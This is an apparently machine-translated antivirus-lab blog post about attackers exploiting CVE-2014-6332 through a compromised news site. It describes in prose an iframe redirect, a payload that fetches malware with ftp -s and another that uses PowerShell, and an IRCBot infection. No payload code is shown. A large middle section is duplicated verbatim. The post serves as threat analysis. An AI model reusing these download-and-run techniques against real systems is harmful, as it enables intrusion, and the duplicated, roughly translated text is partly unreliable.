Attackers use CVE-2014-6332
Recently we wrote about a new dangerous vulnerability CVE-2014-6332 in Windows, which was present (MS14-064) in the OleAut32.dll library, or rather, in the OleAut32! SafeArrayRedim function . This function is used by the VBScript engine (vbscript.dll) for run-time resizing of the array in the SAFEARRAY format. SafeArrayRedim itself contained a vulnerability that allowed modifying the array size field inside the function and then returning the result of the operation failure, which led to an increase in the buffer size from the point of view of the structure itself. See more here .
Due to the fact that the exploit for this vulnerability (Windows OLE Automation Array Remote Code Execution Vulnerability), in fact, can operate directly on the memory, due to damage to the buffer header structure by the OS function, it does not need to resort to use-after-vulnerability operations free , the entire operation is reduced to the sequential execution of several functions that help start the process from a VBScript function, bypassing DEP & ASLR.
')
Analysts at our anti-virus lab found exploitation of this vulnerability in-the-wild. This is a compromise of the harmful content of the website of a popular Bulgarian news agency. We observed one of the web pages of this site that was compromised and redirected visitors to install malware using CVE-2014-6332. The appearance of this compromised web page is shown below in the screenshot.
The source HTML code of this web page contains a malicious iframe that points to the exploit installation page.
As seen in the screenshot above, the exploit is placed on a web page belonging to the natmasla domain [.] Ru. It is detected by ESET AV products as Win32 / Exploit.CVE-2014-6332.A . The discovered exploit is based on a proof-of-concept code, which was published by a Chinese editor. In the PoC indicated his data.
It was easy for an attacker to modify the original PoC to install its malicious software into the system.
Oddly enough, the malicious page itself contains the exploit code twice. In the first case, the payload is a set of instructions from the Windows command interpreter (cmd.exe). They are listed in the screenshot below.
As you can see, in this set of commands there is one group of them with the [at] echo prefix, which is intended for writing special instructions to a text file (KdFKkDls.txt, the file name may be different for different modifications of the exploit). These instructions are intended for the ftp application, which runs with the special key -s (take commands to execute from a file). Special ftp instructions are written to the file. They are used to connect to a remote server with the specified username and password, then the executable file is loaded and launched.
In the case of the second payload, it looks like the following instructions.
It can be seen that this time PowerShell is used to download the executable file from a remote server.
Malware downloaded in this way is detected by ESET AV products as Win32 / IRCBot.NHR . It has a number of features in its arsenal, including the organization of DDoS attacks and the opening of remote access to a computer for intruders.
Due to the fact that the exploit for this vulnerability (Windows OLE Automation Array Remote Code Execution Vulnerability), in fact, can operate directly on the memory, due to damage to the buffer header structure by the OS function, it does not need to resort to use-after-vulnerability operations free , the entire operation is reduced to the sequential execution of several functions that help start the process from a VBScript function, bypassing DEP & ASLR.
')
Analysts at our anti-virus lab found exploitation of this vulnerability in-the-wild. This is a compromise of the harmful content of the website of a popular Bulgarian news agency. We observed one of the web pages of this site that was compromised and redirected visitors to install malware using CVE-2014-6332. The appearance of this compromised web page is shown below in the screenshot.
The source HTML code of this web page contains a malicious iframe that points to the exploit installation page.
As seen in the screenshot above, the exploit is placed on a web page belonging to the natmasla domain [.] Ru. It is detected by ESET AV products as Win32 / Exploit.CVE-2014-6332.A . The discovered exploit is based on a proof-of-concept code, which was published by a Chinese editor. In the PoC indicated his data.
It was easy for an attacker to modify the original PoC to install its malicious software into the system.
Oddly enough, the malicious page itself contains the exploit code twice. In the first case, the payload is a set of instructions from the Windows command interpreter (cmd.exe). They are listed in the screenshot below.
As you can see, in this set of commands there is one group of them with the [at] echo prefix, which is intended for writing special instructions to a text file (KdFKkDls.txt, the file name may be different for different modifications of the exploit). These instructions are intended for the ftp application, which runs with the special key -s (take commands to execute from a file). Special ftp instructions are written to the file. They are used to connect to a remote server with the specified username and password, then the executable file is loaded and launched.
In the case of the second payload, it looks like the following instructions.
It can be seen that this time PowerShell is used to download the executable file from a remote server.
Malware downloaded in this way is detected by ESET AV products as Win32 / IRCBot.NHR . It has a number of features in its arsenal, including the organization of DDoS attacks and the opening of remote access to a computer for intruders.
Source: https://habr.com/ru/post/244115/
All Articles